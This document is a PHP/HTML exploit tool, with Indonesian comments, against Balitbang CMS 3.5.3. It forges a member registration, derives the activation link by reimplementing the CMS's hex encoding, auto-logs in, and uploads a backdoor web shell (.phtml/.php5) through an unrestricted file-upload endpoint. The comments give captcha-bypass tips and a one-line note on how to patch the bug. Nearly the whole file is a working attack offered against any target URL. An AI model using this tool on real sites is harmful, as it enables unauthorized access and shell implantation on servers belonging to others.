CSRF Balitbang

1. <html>
2. <!---
3. // script ini dibuat berdasarkan iseng saja... :)
4. // by. kitasemua
5. // --------------------------
6. // Simpan script ini dengan nama: test.php
7. // - Jika captcha tidak muncul, buka inspect element, arahin cursor ke captcha, ganti link captcha "/functions/captcha/captcha.php" -> "/functions/spam.php"
8. // - Jika bypass login gagal, silahkan login manual, kemudian lanjut upload shellnya
9. // - Format shell: *.phtml, *.php5
10. // --------------------------
11. // Bugs terletak pada /functons/simmateri.php dan /functions/simmateriguru.php
12. // Cara menutup bugs ini: gunakan fungsi batasan ekstensi file seperti di /functions/simlapguru.php
13. // --------------------------
14. // Tunggu Tutorial selanjutnya "Bypass $_SESSION untuk Lokomedia, Balitbang, F0rmulaCMS".
15. // --------------------------
16. -->
17. <head>
18. <title>Balitbang 3.5.3</title>
19. </head>
20. <style type="text/css">
21. input[type=text],input[type=code],input[type=password]{
22. border:1px solid #c0c0c0;
23. height:24px;
24. padding:5px;
25. }
26. </style>
27. <body>
28. <?php
29. function hex($str='',$code='') {
30. if(($code>=0)and($code<100)) {
31. $t .=dechex(strlen($str)+$code)."g";
32. $str=strrev($str);
33. for($i=0;$i<=strlen($str)-1;$i++) {
34. $t .=dechex(ord(substr($str,$i,1))+$code);
35. }
36. }
37. return $t;
38. }
39. function unhex($str='',$code='') {
40. $all=explode("g",$str);
41. $head=hexdec($all[0])-$code;
42. $content=$all[1];
43. if($head==(strlen($content)/2)) {
44. for($i=0;$i<=$head-1;$i++) {
45. $t .=chr(hexdec(substr($content,$i*2,2))-$code);
46. }
47. $t =strrev($t);
48. }
49. return $t;
50. }
51. $target = $_GET['target'];
52. $ur_target = $target."/member/membersave.php";
53. $ur_upload = $target."/functions/simmateri.php";
54. $captcha = $target."/functions/captcha/captcha.php";
55. $ur_login = $target."/member/ajax_login.php";
56. $userx = $_GET['n'];
57. $passx = $_GET['p'];
58. if(isset($_POST['next'])){
59. $tar = $_POST['tar'];
60. $n = $_POST['n'];
61. $p = $_POST['p'];
62. header("Location: test.php?load=daftar&n=".$n."&p=".$p."&target=".$tar."");
63. }
64. echo "CSRF Regstration Form + Shell Uploader (Balitbang 3.5.3)<hr>";
65. ?>
66. <form method="post" action="" enctype="multipart/form-data">
67. <table id=tablebaru cellspacing='1' cellpadding='3'>
68. <tr>
69. <td>target</td>
70. <td>:</td>
71. <td><input type="text" name="tar" size="61" placeholder='http://'/></td>
72. </tr>
73. <tr>
74. <td>username</td>
75. <td>:</td>
76. <td><input type="text" name="n" size="61"/></td>
77. </tr>
78. <tr>
79. <td>password</td>
80. <td>:</td>
81. <td><input type="text" name="p" size="61"/></td>
82. </tr>
83. <tr>
84. <td></td>
85. <td></td>
86. <td><input type="submit" name="next" value="NEXT &raquo;"/></td>
87. </tr>
88. </table>
89. </form>
90. <hr>
91. <?php if(isset($_GET['load']) && $_GET['load'] == "daftar"){
92. $asli = hex($userx,"82");
93. $pass = hex($passx,"82");
94. echo "username : <b>$userx</b><br>";
95. echo "password : <b>$passx</b><hr>";
96. ?>
97. <form name='formID' action="<?php echo $ur_target;?>" method='post' target='iframe'>
98. <input type=hidden name='userid' value='<?php echo hex("simtambah,","82");?>'>
99. <input type=hidden name='name' value='ganteng'/>
100. <input type=hidden name='username' value='<?php echo $userx;?>'/>
101. <input type=hidden name='password' value='<?php echo $passx;?>'/>
102. <input type=hidden name='email' value='abc@abc.abc'/>
103. <input type=hidden name='kelamin' value='m'/>
104. <input type=hidden name='jenis' value='Tamu'>
105. <input type=hidden name='kelas' value=''/>
106. <input type=hidden name='hari' value='01'/>
107. <input type=hidden name='bulan' value='01'/>
108. <input type=hidden name='tahun' value='1995'/>
109. <input type=hidden name='nis' value=''/>
110. <input type=hidden name='pertanyaan' value='1'/>
111. <input type=hidden name='jawaban' value='1'/>
112. <input type=hidden name='kerja' value='Guru'/>
113. <input type=hidden name='alamat' value='jauh'/>
114. <input type=hidden name='sekolah' value='terserah'/>
115. <input type=hidden name='telp' value='0'/>
116. <input type=hidden name='blog' value=''/>
117. <input type=hidden name='tentang' value='terserah'/>
118. <input type=hidden name='country' value='INDONESIA'/>
119. <input type=hidden name='stprofil' value='open'/>
120. <input type=hidden name='stblog' value='on'/>
121. <table>
122. <tr>
123. <td colspan="2" valign="top"><img src='<?php echo $captcha;?>' width='162' height="85"></td>
124. <td rowspan="2" valign="top"><i>&raquo; capture target...</i><br><iframe name='iframe' width='310' height='90' style="border:1px solid #c0c0c0;"></iframe></td>
125. </tr>
126. <tr>
127. <td valign="top"><input type='text' name='code' size='12' placeholder="captcha"/></td>
128. <td valign="top"><input type=submit name='submit' value='GO &raquo;'/></td>
129. </tr>
130. </table>
131. </form>
132. <?php
133. echo "<!--
134. ini kode registrasinya: valid/index.php?id=".$asli."&p=".$pass."
135. -->
136. ";
137. echo "Langkah selanjutnya:<br>1. Setelah registrasi berhasil, <input type='button' value='klik disini' onclick=\"verif.location.href='".$target."/valid/index.php?id=".$asli."&p=".$pass."'\"/> untuk aktivasi/verifikasi!.
138. <br><i>&raquo; capture target...</i><br><iframe name='verif' width='480' height='90' style='border:1px solid #c0c0c0;'></iframe><br>2. Langkah terakhir, Upload backdoornya <input type='button' onclick=\"window.location.href='test.php?load=upload&n=".$userx."&p=".$passx."&target=".$target."'\" value='lewat sini brade!!'/><hr>";
139. } else if(isset($_GET['load']) && $_GET['load'] == "upload"){
140. ?>
141. <script type="text/javascript">
142. window.onload = function(){
143. document.forms['login_form'].submit()
144.  
145. }
146. function setURL(url){
147. document.getElementById('verif').src = url;
148. }
149. </script>
150. <form method="post" action="<?php echo $ur_login;?>" target='autologin' name='login_form'>
151. <input type='hidden' name='user_name' value="<?php echo $userx;?>"/>
152. <input type='hidden' name='password' value="<?php echo $passx;?>"/>
153. Jika tidak bisa login dihalaman member, <input type='submit' name='submit' value='Klik disini untuk bikin SESSION'/>
154. </form>
155. <div style='margin-top:-20px;'>
156. <iframe name='autologin' width='30' height='30' style="border:0;"></iframe>
157. </div>
158. <form action='<?php echo $ur_upload;?>' method='post' enctype="multipart/form-data" target='golink'>
159. <input type='hidden' name='pesan' value='abcabcabc'/></td>
160. <table cellspacing='1' cellpadding='3'>
161. <tr>
162. <td valign='top'>File</td>
163. <td valign='top'>:</td>
164. <td valign='top'><input type='file' name='file'></td>
165. <td valign='top' align='right'><input type='submit' value=' Simpan '/></td>
166. </tr>
167. <tr>
168. <td valign='top' colspan="4"><i>&raquo; capture target...</i><br><iframe name='golink' width='475' height='150' style="border:1px solid #c0c0c0;"></iframe></td>
169. </tr>
170. <tr>
171. <td valign='top' colspan="4">
172. hasil upload (.php5): <a href="<?php echo $target."/tugas/tgs-ganteng.php5";?>" target="_blank"><?php echo $target."/tugas/tgs-ganteng.php5";?></a><br>
173. hasil upload (.phtml): <a href="<?php echo $target."/tugas/tgs-ganteng.phtml";?>" target="_blank"><?php echo $target."/tugas/tgs-ganteng.phtml";?></a></td>
174. </tr>
175. </table>
176. <input type=hidden name='st' value='ganteng'>
177. <input type=hidden name='nis' value=''>
178. <input type=hidden name='idtugas' value=''>
179. </form>
180. <hr>
181. <?php } ?>
182. </body>
183. </html>